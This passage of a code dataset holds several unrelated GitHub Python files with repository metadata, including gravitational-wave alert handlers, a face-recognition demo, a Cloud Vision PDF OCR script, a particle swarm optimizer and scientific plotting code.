sum(train_tick_144)/25])\nplt.xlabel(\"Time Tick\")\nplt.ylabel(\"Average Norm of Persistence Landscape\")\nplt.show()\n\n\n\n\n\n\"\"\"\n\ngraphs the vectors and sums from simulations 1-100\n\n\"\"\"\n\n#\n# all_vectors = pd.read_csv(\"vectors_152_6.csv\")\n# all_vectors.fillna(0, inplace=True)\n#\n# tick_0 = all_vectors.loc[all_vectors[\"tick number\"] == 0]\n# tick_48 
= all_vectors.loc[all_vectors[\"tick number\"] == 48]\n# tick_96 = all_vectors.loc[all_vectors[\"tick number\"] == 96]\n# tick_144 = all_vectors.loc[all_vectors[\"tick number\"] == 144]\n#\n# tick_0_mean = format_list(tick_0.mean())\n# tick_48_mean = format_list(tick_48.mean())\n# tick_96_mean = format_list(tick_96.mean())\n# tick_144_mean = format_list(tick_144.mean())\n#\n# sums = pd.read_csv(\"sums_normalized_lr.csv\")\n# sums_means = format_list_sums(sums.mean())\n#\n# # plt.plot(tick_0_mean[0], tick_0_mean[1])\n# # plt.plot(tick_48_mean[0], tick_48_mean[1])\n# # plt.plot(tick_96_mean[0], tick_96_mean[1])\n# # plt.plot(tick_144_mean[0], tick_144_mean[1])\n# # plt.show()\n#\n# plt.plot(sums_means[0], sums_means[1])\n# plt.xlabel(\"Time Tick\")\n# plt.ylabel(\"Average Sum\")\n# plt.show()\n# exit()","repo_name":"jmdrisco/tortuosity_tda","sub_path":"source/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":7251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"6017162763","text":"from django.urls import path\n\nfrom . import views\n\n# URLConf\napp_name='blog'\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('main_info/', views.main_info, name='main_info'),\n    path('experience/', views.experience, name='experience'),\n    path('education/', views.education, name='education'),\n]","repo_name":"temirlanr/test-project","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"41258290633","text":"from lxml import etree\nfrom urllib.parse import urlparse\nfrom celery import group\nfrom celery.utils.log import get_logger\n\nfrom .. import app\nfrom .core import identity\nfrom . import detchar\nfrom . import gcn\nfrom . import gracedb\nfrom . import external_skymaps\nfrom . import igwn_alert\nfrom . 
import raven\n\nlog = get_logger(__name__)\n\n\nREQUIRED_LABELS_BY_TASK = {\n    'compare': {'SKYMAP_READY', 'EXT_SKYMAP_READY', 'EM_COINC'},\n    'combine': {'SKYMAP_READY', 'EXT_SKYMAP_READY', 'RAVEN_ALERT'}\n}\n\"\"\"These labels should be present on an external event to consider it to\nbe ready for sky map comparison.\n\"\"\"\n\nFERMI_GRB_CLASS_VALUE = 4\n\"\"\"This is the index that denotes GRBs within Fermi's Flight Position\nclassification.\"\"\"\n\nFERMI_GRB_CLASS_THRESH = 50\n\"\"\"This value denotes the threshold of the most likely Fermi source\nclassification, above which we will consider a Fermi Flight Position\nnotice.\"\"\"\n\n\n@gcn.handler(gcn.NoticeType.SNEWS,\n             queue='exttrig',\n             shared=False)\ndef handle_snews_gcn(payload):\n    \"\"\"Handles the payload from SNEWS alerts.\n\n    Prepares the alert to be sent to graceDB as 'E' events.\n    \"\"\"\n    root = etree.fromstring(payload)\n\n    # Get TrigID and Test Event Boolean\n    trig_id = root.find(\"./What/Param[@name='TrigID']\").attrib['value']\n    ext_group = 'Test' if root.attrib['role'] == 'test' else 'External'\n\n    event_observatory = 'SNEWS'\n    query = 'group: External pipeline: {} grbevent.trigger_id = \"{}\"'.format(\n        event_observatory, trig_id)\n    events = gracedb.get_events(query=query)\n\n    if events:\n        assert len(events) == 1, 'Found more than one matching GraceDB entry'\n        event, = events\n        graceid = event['graceid']\n        canvas = gracedb.replace_event.s(graceid, payload)\n\n    else:\n        canvas = gracedb.create_event.s(filecontents=payload,\n                                        search='Supernova',\n                                        group=ext_group,\n                                        pipeline=event_observatory)\n        canvas |= _launch_external_detchar.s()\n\n    canvas.delay()\n\n\n@gcn.handler(gcn.NoticeType.FERMI_GBM_ALERT,\n             gcn.NoticeType.FERMI_GBM_FLT_POS,\n             gcn.NoticeType.FERMI_GBM_GND_POS,\n             gcn.NoticeType.FERMI_GBM_FIN_POS,\n             gcn.NoticeType.SWIFT_BAT_GRB_POS_ACK,\n             gcn.NoticeType.FERMI_GBM_SUBTHRESH,\n             gcn.NoticeType.INTEGRAL_WAKEUP,\n             gcn.NoticeType.INTEGRAL_REFINED,\n             gcn.NoticeType.INTEGRAL_OFFLINE,\n             gcn.NoticeType.AGILE_MCAL_ALERT,\n             queue='exttrig',\n             shared=False)\ndef handle_grb_gcn(payload):\n    \"\"\"Handles the payload from Fermi, Swift, INTEGRAL, and AGILE MCAL\n    GCN notices.\n\n    Filters out candidates likely to be noise. Creates an external event\n    from the notice if it is new, otherwise updates the existing event. 
Then\n    creates and/or grabs the external sky map to be uploaded to the external event.\n\n    More info for these notices can be found at:\n    Fermi-GBM: https://gcn.gsfc.nasa.gov/fermi_grbs.html\n    Fermi-GBM sub: https://gcn.gsfc.nasa.gov/fermi_gbm_subthresh_archive.html\n    Swift: https://gcn.gsfc.nasa.gov/swift.html\n    INTEGRAL: https://gcn.gsfc.nasa.gov/integral.html\n    AGILE-MCAL: https://gcn.gsfc.nasa.gov/agile_mcal.html\n    \"\"\"\n    root = etree.fromstring(payload)\n    u = urlparse(root.attrib['ivorn'])\n    stream_path = u.path\n\n    # Get TrigID\n    try:\n        trig_id = root.find(\"./What/Param[@name='TrigID']\").attrib['value']\n    except AttributeError:\n        trig_id = root.find(\"./What/Param[@name='Trans_Num']\").attrib['value']\n    ext_group = 'Test' if root.attrib['role'] == 'test' else 'External'\n\n    notice_type = \\\n        int(root.find(\"./What/Param[@name='Packet_Type']\").attrib['value'])\n\n    stream_obsv_dict = {'/SWIFT': 'Swift',\n                        '/Fermi': 'Fermi',\n                        '/INTEGRAL': 'INTEGRAL',\n                        '/AGILE': 'AGILE'}\n    event_observatory = stream_obsv_dict[stream_path]\n\n    reliability = root.find(\"./What/Param[@name='Reliability']\")\n    if reliability is not None and int(reliability.attrib['value']) <= 4:\n        return\n\n    # Check if Fermi trigger is likely noise by checking classification\n    # Most_Likely_Index of 4 is an astrophysical GRB\n    # If not at least 50% chance of GRB we will not consider it for RAVEN\n    likely_source = root.find(\"./What/Param[@name='Most_Likely_Index']\")\n    likely_prob = root.find(\"./What/Param[@name='Most_Likely_Prob']\")\n    not_likely_grb = likely_source is not None and \\\n        (int(likely_source.attrib['value']) != FERMI_GRB_CLASS_VALUE\n         or float(likely_prob.attrib['value']) < FERMI_GRB_CLASS_THRESH)\n\n    # Check if initial Fermi alert. These are generally unreliable and should\n    # never trigger a RAVEN alert, but will give us earlier warning of a\n    # possible coincidence. Later notices could change this.\n    initial_gbm_alert = notice_type == gcn.NoticeType.FERMI_GBM_ALERT\n\n    # Check if Swift has lost lock. 
If so then veto\n lost_lock = \\\n root.find(\"./What/Group[@name='Solution_Status']\" +\n \"/Param[@name='StarTrack_Lost_Lock']\")\n swift_veto = lost_lock is not None and lost_lock.attrib['value'] == 'true'\n\n # Only send alerts if likely a GRB, is not a low-confidence early Fermi\n # alert, and if not a Swift veto\n if not_likely_grb or initial_gbm_alert or swift_veto:\n labels = ['NOT_GRB']\n else:\n labels = None\n\n ivorn = root.attrib['ivorn']\n if 'subthresh' in ivorn.lower():\n search = 'SubGRB'\n elif 'mdc-test_event' in ivorn.lower():\n search = 'MDC'\n else:\n search = 'GRB'\n\n query = 'group: External pipeline: {} grbevent.trigger_id = \"{}\"'.format(\n event_observatory, trig_id)\n events = gracedb.get_events(query=query)\n\n group_canvas = ()\n if events:\n assert len(events) == 1, 'Found more than one matching GraceDB entry'\n event, = events\n graceid = event['graceid']\n if labels:\n canvas = gracedb.create_label.si(labels[0], graceid)\n else:\n canvas = gracedb.remove_label.si('NOT_GRB', graceid)\n\n # Prevent SubGRBs from appending GRBs\n if search == 'GRB':\n # Replace event and pass already existing event dictionary\n canvas |= gracedb.replace_event.si(graceid, payload)\n canvas |= identity.si(event)\n else:\n return\n\n else:\n canvas = gracedb.create_event.s(filecontents=payload,\n search=search,\n group=ext_group,\n pipeline=event_observatory,\n labels=labels)\n group_canvas += _launch_external_detchar.s(),\n\n if search in {'GRB', 'MDC'}:\n notice_date = root.find(\"./Who/Date\").text\n group_canvas += external_skymaps.create_upload_external_skymap.s(\n notice_type, notice_date),\n if event_observatory == 'Fermi':\n if search == 'SubGRB':\n skymap_link = \\\n root.find(\"./What/Param[@name='HealPix_URL']\").attrib['value']\n group_canvas += \\\n external_skymaps.get_upload_external_skymap.s(skymap_link),\n elif search == 'GRB':\n skymap_link = None\n group_canvas += \\\n external_skymaps.get_upload_external_skymap.s(skymap_link),\n\n (\n canvas\n |\n group(group_canvas)\n ).delay()\n\n\n@igwn_alert.handler('superevent',\n 'mdc_superevent',\n 'external_fermi',\n 'external_swift',\n 'external_integral',\n 'external_agile',\n shared=False)\ndef handle_grb_igwn_alert(alert):\n \"\"\"Parse an IGWN alert message related to superevents/GRB external triggers\n and dispatch it to other tasks.\n\n Notes\n -----\n This IGWN alert message handler is triggered by creating a new superevent\n or GRB external trigger event, or a label associated with completeness of\n skymaps:\n\n * Any new event triggers a coincidence search with\n :meth:`gwcelery.tasks.raven.coincidence_search`.\n * When both a GW and GRB sky map are available during a coincidence,\n indicated by the labels ``SKYMAP_READY`` and ``EXT_SKYMAP_READY``\n respectively on the external event, this triggers the spacetime coinc\n FAR to be calculated. 
If an alert is triggered with these same\n conditions, indicated by the ``RAVEN_ALERT`` label, a combined GW-GRB\n sky map is created using\n :meth:`gwcelery.tasks.external_skymaps.create_combined_skymap`.\n\n \"\"\"\n # Determine GraceDB ID\n graceid = alert['uid']\n\n # launch searches\n if alert['alert_type'] == 'new':\n if alert['object'].get('group') == 'External':\n # Create and upload Swift sky map for the joint targeted\n # sub-threshold search as agreed on in the MOU\n if alert['object']['search'] == 'SubGRBTargeted' and \\\n alert['object']['pipeline'] == 'Swift':\n external_skymaps.create_upload_external_skymap(\n alert['object'], None, alert['object']['created'])\n\n # launch search with MDC events and exit\n if alert['object']['search'] == 'MDC':\n raven.coincidence_search(graceid, alert['object'],\n group='CBC', se_searches=['MDC'])\n raven.coincidence_search(graceid, alert['object'],\n group='Burst', se_searches=['MDC'])\n return\n\n # launch standard Burst-GRB search\n raven.coincidence_search(graceid, alert['object'], group='Burst',\n se_searches=['Allsky'])\n\n if alert['object']['search'] in ['SubGRB', 'SubGRBTargeted']:\n # if sub-threshold GRB, launch search with that pipeline\n raven.coincidence_search(\n graceid, alert['object'], group='CBC',\n searches=['SubGRB', 'SubGRBTargeted'],\n pipelines=[alert['object']['pipeline']])\n else:\n # if threshold GRB, launch standard CBC-GRB search\n raven.coincidence_search(graceid, alert['object'],\n group='CBC', searches=['GRB'])\n elif 'S' in graceid:\n # launch standard GRB search based on group\n gw_group = alert['object']['preferred_event_data']['group']\n\n # launch search with MDC events and exit\n if alert['object']['preferred_event_data']['search'] == 'MDC':\n raven.coincidence_search(graceid, alert['object'],\n group=gw_group, searches=['MDC'])\n return\n\n if gw_group == 'CBC':\n # launch subthreshold searches if CBC\n # for Fermi and Swift separately to use different time windows\n for pipeline in ['Fermi', 'Swift']:\n raven.coincidence_search(\n graceid, alert['object'], group='CBC',\n searches=['SubGRB', 'SubGRBTargeted'],\n pipelines=[pipeline])\n se_searches = []\n else:\n se_searches = ['Allsky']\n # launch standard GRB search\n raven.coincidence_search(graceid, alert['object'],\n group=gw_group, searches=['GRB'],\n se_searches=se_searches)\n # rerun raven pipeline or created combined sky map when sky maps are\n # available\n elif alert['alert_type'] == 'label_added' and \\\n alert['object'].get('group') == 'External':\n if _skymaps_are_ready(alert['object'], alert['data']['name'],\n 'compare'):\n # if both sky maps present and a coincidence, compare sky maps\n superevent_id, ext_ids = _get_superevent_ext_ids(\n graceid, alert['object'], 'compare')\n superevent = gracedb.get_superevent(superevent_id)\n preferred_event_id = superevent['preferred_event']\n gw_group = gracedb.get_group(preferred_event_id)\n tl, th = raven._time_window(graceid, gw_group,\n [alert['object']['pipeline']],\n [alert['object']['search']])\n raven.raven_pipeline([alert['object']], superevent_id, superevent,\n tl, th, gw_group)\n if _skymaps_are_ready(alert['object'], alert['data']['name'],\n 'combine'):\n # if both sky maps present and a raven alert, create combined\n # skymap\n superevent_id, ext_id = _get_superevent_ext_ids(\n graceid, alert['object'], 'combine')\n external_skymaps.create_combined_skymap(superevent_id, ext_id)\n elif 'EM_COINC' in alert['object']['labels']:\n # if not complete, check if GW sky map; apply label to 
external\n # event if GW sky map\n se_labels = gracedb.get_labels(alert['object']['superevent'])\n if 'SKYMAP_READY' in se_labels:\n gracedb.create_label.si('SKYMAP_READY', graceid).delay()\n elif alert['alert_type'] == 'label_added' and 'S' in graceid and \\\n 'SKYMAP_READY' in alert['object']['labels']:\n # if sky map in superevent, apply label to all external events\n # at the time\n group(\n gracedb.create_label.si('SKYMAP_READY', ext_id)\n for ext_id in alert['object']['em_events']\n ).delay()\n elif alert['alert_type'] == 'label_removed' and \\\n alert['object'].get('group') == 'External':\n if alert['data']['name'] == 'NOT_GRB' and \\\n 'EM_COINC' in alert['object']['labels']:\n # if NOT_GRB is removed, re-check publishing conditions\n superevent_id = alert['object']['superevent']\n superevent = gracedb.get_superevent(superevent_id)\n gw_group = superevent['preferred_event_data']['group']\n coinc_far_dict = {\n 'temporal_coinc_far': superevent['time_coinc_far'],\n 'spatiotemporal_coinc_far': superevent['space_coinc_far']\n }\n raven.trigger_raven_alert(coinc_far_dict, superevent, graceid,\n alert['object'], gw_group)\n\n\n@igwn_alert.handler('superevent',\n 'mdc_superevent',\n 'external_snews',\n shared=False)\ndef handle_snews_igwn_alert(alert):\n \"\"\"Parse an IGWN alert message related to superevents/SN external triggers\n and dispatch it to other tasks.\n\n Notes\n -----\n This igwn_alert message handler is triggered by creating a new superevent\n or SN external trigger event:\n\n * Any new event triggers a coincidence search with\n :meth:`gwcelery.tasks.raven.coincidence_search`.\n\n \"\"\"\n # Determine GraceDB ID\n graceid = alert['uid']\n\n if alert['alert_type'] == 'new':\n if alert['object'].get('superevent_id'):\n group = alert['object']['preferred_event_data']['group']\n # Run on Test and Burst superevents\n if group in {'Burst', 'Test'}:\n raven.coincidence_search(graceid, alert['object'],\n group='Burst', searches=['Supernova'],\n pipelines=['SNEWS'])\n else:\n # Run on SNEWS event, either real or test\n raven.coincidence_search(graceid, alert['object'],\n group='Burst', searches=['Supernova'],\n pipelines=['SNEWS'])\n\n\ndef _skymaps_are_ready(event, label, task):\n label_set = set(event['labels'])\n required_labels = REQUIRED_LABELS_BY_TASK[task]\n return required_labels.issubset(label_set) and label in required_labels\n\n\ndef _get_superevent_ext_ids(graceid, event, task):\n if task == 'combine':\n if 'S' in graceid:\n se_id = event['superevent_id']\n ext_id = event['em_type']\n else:\n se_id = event['superevent']\n ext_id = event['graceid']\n elif task == 'compare':\n if 'S' in graceid:\n se_id = event['superevent_id']\n ext_id = event['em_events']\n else:\n se_id = event['superevent']\n ext_id = [event['graceid']]\n return se_id, ext_id\n\n\n@app.task(shared=False)\ndef _launch_external_detchar(event):\n start = event['gpstime']\n if event['search'] == 'Supernova':\n start, end = event['gpstime'], event['gpstime']\n else:\n integration_time = \\\n event['extra_attributes']['GRB']['trigger_duration'] or 4.0\n end = start + integration_time\n detchar.check_vectors.si(event, event['graceid'], start, end).delay()\n\n return event\n","repo_name":"lpsinger/gwcelery","sub_path":"gwcelery/tasks/external_triggers.py","file_name":"external_triggers.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"41798848648","text":"import cv2\nimport numpy as np\nimport 
face_recognition\n\n\nfilename = \"Assets\\All_faces.jpg\"\nfilename2 = \"Assets\\IMG-20181024-WA0007.jpg\"\n#cap = cv2.VideoCapture(filename)\n#cap.open(filename)\n# image = face_recognition.load_image_file('ZOZ.jpg')\n\nimage = cv2.imread(filename,-1)\nimageTest = cv2.imread(filename2,-1)\n\nif image is None:\n    file = filename.split('\\\\')[1]\n    print(f\"Image {file} not found\")\n    quit()\n\nif imageTest is None:\n    file = filename2.split('\\\\')[1]\n    print(f\"Image {file} not found\")\n    quit()\n\n# image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# imageTest = cv2.cvtColor(imageTest, cv2.COLOR_BGR2RGB)\n\n\nknown_face_locations = face_recognition.face_locations(image) #return: A list of tuples of found face locations in css (top, right, bottom, left) order\nknown_face_encodings = face_recognition.face_encodings(image)\n\n# the order of people matches the order in which faces are detected above\nx = 0\npeople = ['Hamed','Khaled','Rema','Ali','Lana','Zozo','Yanal']\nfor faceLoc in known_face_locations:\n    img = image[faceLoc[0]:faceLoc[2], faceLoc[3]:faceLoc[1]]\n    cv2.imwrite(f'Assets\\Faces\\{people[x]}.png', img)\n    cv2.rectangle(image,(faceLoc[3], faceLoc[0]),(faceLoc[1],faceLoc[2]),(255,0,0),1)\n    cv2.putText(image,f'{people[x]}', (faceLoc[3],faceLoc[0]), cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)\n    x+=1\n\n\n\nfaceLocationsTest = face_recognition.face_locations(imageTest) #return: A list of tuples of found face locations in css ( top 0 , right 1 , bottom 2 , left 3 ) order\n\n\nfaces_encodings_to_check = face_recognition.face_encodings(imageTest)\n\n\nfor faceLoc, face_encoding_to_check in zip(faceLocationsTest, faces_encodings_to_check):\n    # compare this face against every known encoding (tolerance 0.5)\n    matches = face_recognition.compare_faces(known_face_encodings, face_encoding_to_check, 0.5)\n    name = people[matches.index(True)] if True in matches else 'Unknown'\n    print(name, matches)\n    cv2.rectangle(imageTest,(faceLoc[3], faceLoc[0]),(faceLoc[1],faceLoc[2]),(255,0,0),1)\n    cv2.putText(imageTest, name, (faceLoc[3],faceLoc[0]), cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)\n\ncv2.putText(image, \"Found Faces\", (30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255), 2,)\n\ncv2.imshow(\"Faces Found\",imageTest)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n","repo_name":"nightcap79/python","sub_path":"FaceRecognition/singleFile.py","file_name":"singleFile.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"25266114032","text":"import os, io\nimport re #regular expression module\nfrom google.cloud import vision\nfrom google.cloud import storage\nfrom google.protobuf import json_format # needed to parse the JSON output in my bucket\n\"\"\"\n# all libraries installed\n\"\"\"\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'fourth-elixir-273216-06b58e3308db.json' # my service account\nclient = vision.ImageAnnotatorClient()\nbatch_size = 1 # PDF pages per output file\nmime_type = 'application/pdf' #file type\nfeature = vision.types.Feature(\ntype=vision.enums.Feature.Type.DOCUMENT_TEXT_DETECTION)\n\n\ngcs_source_uri = 'gs://greenertronics-42/test.pdf'\ngcs_source = vision.types.GcsSource(uri=gcs_source_uri) # my source\ninput_config = vision.types.InputConfig(gcs_source=gcs_source, mime_type=mime_type)\n\n\n\ngcs_destination_uri = 'gs://greenertronics-42/pdf_result' # my destination\ngcs_destination = vision.types.GcsDestination(uri=gcs_destination_uri)\n\n\n\noutput_config = vision.types.OutputConfig(gcs_destination=gcs_destination, batch_size=batch_size) # destination config and pages required per batch\nasync_request = 
async_request = vision.types.AsyncAnnotateFileRequest( # an offline file annotation request combining the feature, the source and the destination\nfeatures=[feature], input_config=input_config, output_config=output_config)\noperation = client.async_batch_annotate_files(requests=[async_request])\noperation.result(timeout=180)\nstorage_client = storage.Client()\nmatch = re.match(r'gs://([^/]+)/(.+)', gcs_destination_uri) # split the gs:// link into bucket and prefix\nbucket_name = match.group(1) # the bucket part of the link\nprefix = match.group(2) # the object prefix part\nbucket = storage_client.get_bucket(bucket_name)\n\n\n# List objects with the given prefix\nblob_list = list(bucket.list_blobs(prefix=prefix))\nprint('Output files:')\nfor blob in blob_list: # loop that prints the names of the output files\n    print(blob.name)\n\n\noutput = blob_list[0]\njson_string = output.download_as_string()\nresponse = json_format.Parse(\njson_string, vision.types.AnnotateFileResponse())\nfirst_page_response = response.responses[0]\nannotation = first_page_response.full_text_annotation\nprint(u'Full text:')\nprint(annotation.text)","repo_name":"AsiyaMazhar/gcp_projects","sub_path":"pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"27807238756","text":"'''\r\nSWARM OPTIMIZATION (PARTICLE SWARM)\r\nMade by Thomas Daniel Avila Blenkey - 20151020012\r\nFor the qualitative cybernetics III course\r\nUniversidad Distrital - Faculty of Engineering\r\n'''\r\n\r\nimport random\r\n\r\n# Problem\r\nfuncion_objetivo = \"(x1-3)**2+(x2-5)**2\"\r\nop = \"min\"\r\n\r\niteraciones = 10000\r\n\r\n# 1. SWARM SIZE\r\ntam_enjambre = 4\r\n\r\n# 2. INITIAL POPULATION\r\n# Range of the initial population\r\nx_min = 0\r\nx_max = 7\r\n\r\n# Initial population\r\nx1 = [random.uniform(x_min, x_max) for i in range(tam_enjambre)]\r\nx2 = [random.uniform(x_min, x_max) for i in range(tam_enjambre)]\r\n\r\n# 4. INITIAL VELOCITIES\r\np_best = []\r\ng_best = []\r\nvelocidades_x1 = [0 for i in range(len(x1))]\r\nvelocidades_x2 = [0 for i in range(len(x2))]\r\n\r\n\r\n# 3. EVALUATE THE OBJECTIVE FUNCTION\r\ndef reemplazar_valores(z, x1, x2):\r\n    # evaluate the objective expression with the supplied x1 and x2 values\r\n    return eval(z, {}, {'x1': x1, 'x2': x2})\r\n\r\nfor itr in range(0, iteraciones):\r\n\r\n    #print(\"X1: \" + str(x1))\r\n    #print(\"X2: \" + str(x2))\r\n    #print(\"INFO: VX1: \"+str(velocidades_x1)+\" VX2: \"+str(velocidades_x2)+\", PBEST: \"+str(p_best)+\" GBEST: \"+str(g_best))\r\n\r\n    # List where each element is a list with the value of x1, x2 and the evaluated objective function\r\n    # 16 values\r\n    z = [[x1[i], x2[j], reemplazar_valores(funcion_objetivo, x1[i], x2[j])] for i in range(len(x1)) for j in\r\n         range(len(x2))]\r\n\r\n\r\n    # 5. SELECT PBEST AND GBEST\r\n    # PBest selection (16 values)\r\n\r\n    if itr == 0:\r\n        p_best = [z[i][2] for i in range(len(z))]\r\n    else:\r\n        p_best = [z[i][2] if z[i][2] < p_best[i] else p_best[i] for i in range(len(z))]\r\n\r\n    # GBest selection\r\n    g_best = min(p_best)\r\n\r\n    # 6. 
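PARTICLE VELOCITIES\r\n    # note: this is the standard PSO update, v = w*v + c1*r1*(pbest - x) + c2*r2*(gbest - x)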
\r\n    c1 = 1\r\n    c2 = 1\r\n    r1 = random.uniform(0,1)\r\n    r2 = random.uniform(0,1)\r\n    o_min = 0.4\r\n    o_max = 0.9\r\n    o = o_max - ((o_max - o_min) / 20)\r\n\r\n    # For the velocity equation, the lists are compared to obtain the best p_best for each x1 and x2\r\n    # 4 values\r\n    p_best_x1 = [min([p_best[i + 4 * j] for i in range(0, 4)]) for j in range(0, 4)]\r\n    p_best_x2 = [min([p_best[i] for i in range(len(p_best)) if i % 4 == j]) for j in range(0, 4)]\r\n\r\n    # Compute the velocities for each value of x1 and x2\r\n    velocidades_x1 = [o * velocidades_x1[i] + c1 * r1 * (p_best_x1[i] - x1[i]) + c2 * r2 * (g_best - x1[i]) for i in\r\n                      range(len(x1))]\r\n    velocidades_x2 = [o * velocidades_x2[i] + c1 * r1 * (p_best_x2[i] - x2[i]) + c2 * r2 * (g_best - x2[i]) for i in\r\n                      range(len(x2))]\r\n\r\n    # 7. COMPUTE THE NEW VALUES\r\n    x1 = [x1[i] + velocidades_x1[i] for i in range(len(x1))]\r\n    x2 = [x2[i] + velocidades_x2[i] for i in range(len(x2))]\r\n\r\n\r\n# FINALLY, THE SOLUTION OF THE LAST ITERATION IS PRINTED TO THE CONSOLE\r\nz = [[x1[i], x2[j], reemplazar_valores(funcion_objetivo, x1[i], x2[j])] for i in range(len(x1)) for j in\r\n     range(len(x2))]\r\n\r\nzmin = min(el[2] for el in z)\r\nx1min = 0\r\nx2min = 0\r\nfor el in z:\r\n    if el[2] == zmin:\r\n        x1min = el[0]\r\n        x2min = el[1]\r\n\r\nprint(\"ITERATION = \"+str(itr)+\", X1 = \"+str(x1min)+\", X2 = \"+str(x2min)+\", Z = \"+str(zmin))\r\n","repo_name":"tdavilab/python-optimization-algorithms","sub_path":"swarm-optimization.py","file_name":"swarm-optimization.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"689235776","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.inset_locator import InsetPosition\n\nfrom common.constants import cm, boltzmann_constant\nfrom common.tools import stable_fit_alpha\nfrom gle.theoretics import get_greens_function_parameters\nimport matplotlib.transforms as mtransforms\n\n\ngle_etas = np.arange(0.4, 0.8, 0.01)\ngle_taus = np.arange(0.0, 0.4, 0.01)\ngle_ETAs, gle_TAUs = np.meshgrid(gle_etas, gle_taus, indexing='ij')\neta_tau_ttf_grid = np.load('../eta_tau_ttf_grid_300.npy')\nmarkovian_mask = gle_TAUs == 0\n\n\nfig, axs = plt.subplot_mosaic([['a)', 'b)'], ['c)', 'd)']])\n\n\nplt.sca(axs['a)'])\nplt.plot(gle_etas, gle_etas, c='red', label=r'$\\phi^{-1}=\\eta$')\nplt.scatter(gle_ETAs, eta_tau_ttf_grid, s=2, c=gle_TAUs, label='non-Markov. Langevin eqn.')\nplt.scatter(gle_ETAs[markovian_mask], eta_tau_ttf_grid[markovian_mask], s=20, marker='^', c='black', label='Markov. Langevin eqn.')\n
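# note: panel (a) compares the fitted energy-exchange rate phi^-1 with the friction constant eta; the red line marks the Markovian result phi^-1 = eta\n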
plt.legend(loc='upper left', prop={'size': 8}, frameon=False, bbox_to_anchor=(0.61, 0.9), bbox_transform=fig.transFigure)\nplt.colorbar(label=r'Noise correlation time, $\\tau$ (ps)', fraction=0.1, pad=0.01, location='top')\nplt.clim(0, 0.4)\nplt.ylabel('Energy exchange\\nrate, $\\\\phi^{-1}$ (ps$^{-1}$)')\nplt.xlabel('Friction constant, $\\eta$ (ps$^{-1}$)')\nplt.ylim(0.05, 0.95)\ntrans = mtransforms.ScaledTranslation(0, -0.68, fig.dpi_scale_trans)\nplt.text(0.5, 0.0, 'a)', transform=plt.gca().transAxes + trans, fontsize='medium', va='bottom', fontfamily='serif')\nplt.legend(loc='upper left', prop={'size': 7.5}, frameon=False)\n\n\nplt.sca(axs['b)'])\nw0 = 8.8\neta = 0.4\ntheoretical_Is = np.array([2 * get_greens_function_parameters(w0, eta, tau)[1] / eta for tau in gle_taus])\nplt.plot(gle_taus, 1 / (1 + (w0 * gle_taus)**2), c='grey', label=r'$I = \\frac{1}{1+(\\omega_0\\tau)^2}$')\nplt.plot(gle_taus, 1.0 / (1 + (6.1 * gle_taus)**2), c='black', label=r'$I = \\frac{1}{1+(\\omega_1\\tau)^2}$')\n# plt.scatter(gle_taus, theoretical_Is, s=10, c='black', marker='o', label=r'Equivalent harmonic well')\nplt.scatter(gle_TAUs, eta_tau_ttf_grid / gle_ETAs, s=2, c='orange', label='non-Markov. Langevin eqn.')\nplt.xlabel(r'Noise correlation time, $\\tau$ (ps)')\nplt.ylabel('Energy exchange\\nsuppression factor, $I = \\\\phi^{-1} / \\\\eta$')\n# plt.colorbar(label=r'Friction constant, $\\eta$ (ps$^{-1}$)', fraction=0.1, pad=0.01, location='top')\nplt.legend(loc='upper right', prop={'size': 8}, frameon=False)\ntrans = mtransforms.ScaledTranslation(0, -0.68, fig.dpi_scale_trans)\nplt.text(0.5, 0.0, 'b)', transform=plt.gca().transAxes + trans, fontsize='medium', va='bottom', fontfamily='serif')\nplt.xlim(0, 0.45)\n\n\nplt.sca(axs['c)'])\ntimes = np.arange(0, 100, 0.01)\nfreqs = np.fft.fftfreq(times.shape[0], times[1] - times[0])\nmean_psd = np.load('mean_psd.npy') / 3.8e5 * 2\ntdomain_corr = np.load('tdomain_corr.npy')\nplt.plot(np.fft.fftshift(freqs), np.fft.fftshift(mean_psd))\nplt.plot(np.fft.fftshift(freqs), 1 / (1 + (np.fft.fftshift(freqs) / 7.4)**2))\nplt.xlim(-0.5, 20)\nplt.xlabel('Frequency (THz)')\nplt.ylabel('Force power\\nspectrum (arb. units)')\nplt.text(0.5, 0.0, 'c)', transform=plt.gca().transAxes + trans, fontsize='medium', va='bottom', fontfamily='serif')\n\nax2 = plt.axes([0, 0, 1, 1])\nip = InsetPosition(axs['c)'], [0.42, 0.41, 0.53, 0.54])\nax2.set_axes_locator(ip)\nax2.plot(times, tdomain_corr)\nax2.set_xlim(0, 1.5)\nax2.set_xlabel('Time, t (ps)', labelpad=0)\nax2.set_ylabel('Corresponding\\nAuto-correlation', labelpad=0)\n\n\nm = 23\neta = 0.4\nT = 300\nplt.sca(axs['d)'])\nxhis = np.arange(5e-6, 3e-5, 1e-6) * m**2 # You defined zeta in the paper in a different way to the sim. So need m^2\n
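# note: panel (d) checks the linear fits phi^-1 = eta + 4.76*zeta*kB*T/m plotted below against the cubic-friction simulations\n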
